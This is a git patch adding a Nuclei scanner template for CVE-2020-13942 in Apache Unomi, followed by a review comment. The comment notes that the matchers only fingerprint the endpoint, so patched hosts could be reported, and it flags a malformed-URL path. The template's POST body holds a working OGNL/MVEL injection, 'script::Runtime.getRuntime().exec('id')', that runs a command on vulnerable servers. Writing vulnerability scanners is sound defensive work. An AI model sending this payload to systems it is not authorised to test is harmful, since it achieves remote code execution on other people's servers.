From 05f41079f435069720930507d2808ba0b98ae870 Mon Sep 17 00:00:00 2001
From: Dwi Siswanto
Date: Thu, 19 Nov 2020 00:47:19 +0700
Subject: [PATCH] :fire: Add CVE-2020-13942
---
cves/CVE-2020-13942.yaml | 60 ++++++++++++++++++++++++++++++++++++++++
1 file changed, 60 insertions(+)
create mode 100644 cves/CVE-2020-13942.yaml
diff --git a/cves/CVE-2020-13942.yaml b/cves/CVE-2020-13942.yaml
new file mode 100644
index 0000000000..afa9926a11
--- /dev/null
+++ b/cves/CVE-2020-13942.yaml
@@ -0,0 +1,60 @@
+id: cve-2020-13942
+
+info:
+ name: Apache Unomi Remote Code Execution
+ author: dwisiswant0
+ severity: critical
+ description: |
+ Remote Code Execution in Apache Unomi.
+ Apache Unomi allows conditions to use OGNL and MVEL scripting which
+ offers the possibility to call static Java classes from the JDK
+ that could execute code with the permission level of the running Java process.
+ This vulnerability affects all versions of Apache Unomi prior to 1.5.2. Apache Unomi users should upgrade to 1.5.2 or later.
+
+ References:
+ - https://securityboulevard.com/2020/11/apache-unomi-cve-2020-13942-rce-vulnerabilities-discovered/
+ - https://twitter.com/chybeta/status/1328912309440311297
+
+requests:
+ - method: POST
+ path:
+ - "{{BaseURL}}/context.json"
+ - "{{BaseURL}}:8181/context.json"
+ headers:
+ Content-Type: application/json
+ body: |
+ {
+ "filters": [
+ {
+ "id": "nuclei",
+ "filters": [
+ {
+ "condition": {
+ "parameterValues": {
+ "nuclei": "script::Runtime.getRuntime().exec('id')"
+ },
+ "type": "profilePropertyCondition"
+ }
+ }
+ ]
+ }
+ ],
+ "sessionId": "nuclei"
+ }
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+ - type: word
+ words:
+ - "application/json"
+ - "context-profile-id"
+ condition: and
+ part: header
+ - type: regex
+ regex:
+ - "(profile|session)(Id|Properties|Segments)"
+ - "[a-f0-9]{8}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{12}"
+ condition: and
+ part: body
\ No newline at end of file
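Review bot: The three matchers under `matchers:` only fingerprint a Unomi `/context.json` response (status 200, headers containing `application/json` and `context-profile-id`, a profile/session key and a UUID in the body). None of them depends on whether the `script::` condition was evaluated, so a host already upgraded to 1.5.2 or later that still answers this endpoint would presumably be reported as a critical finding. I would state that limit in the template, e.g. `# A match indicates an exposed Unomi context endpoint only; confirm the installed version is below 1.5.2 before reporting.`, or describe the finding as an exposure in `name` and `severity` rather than confirmed code execution. The second path, `{{BaseURL}}:8181/context.json`, also yields a malformed URL whenever the target is supplied with its own port or path, which is worth a comment next to it.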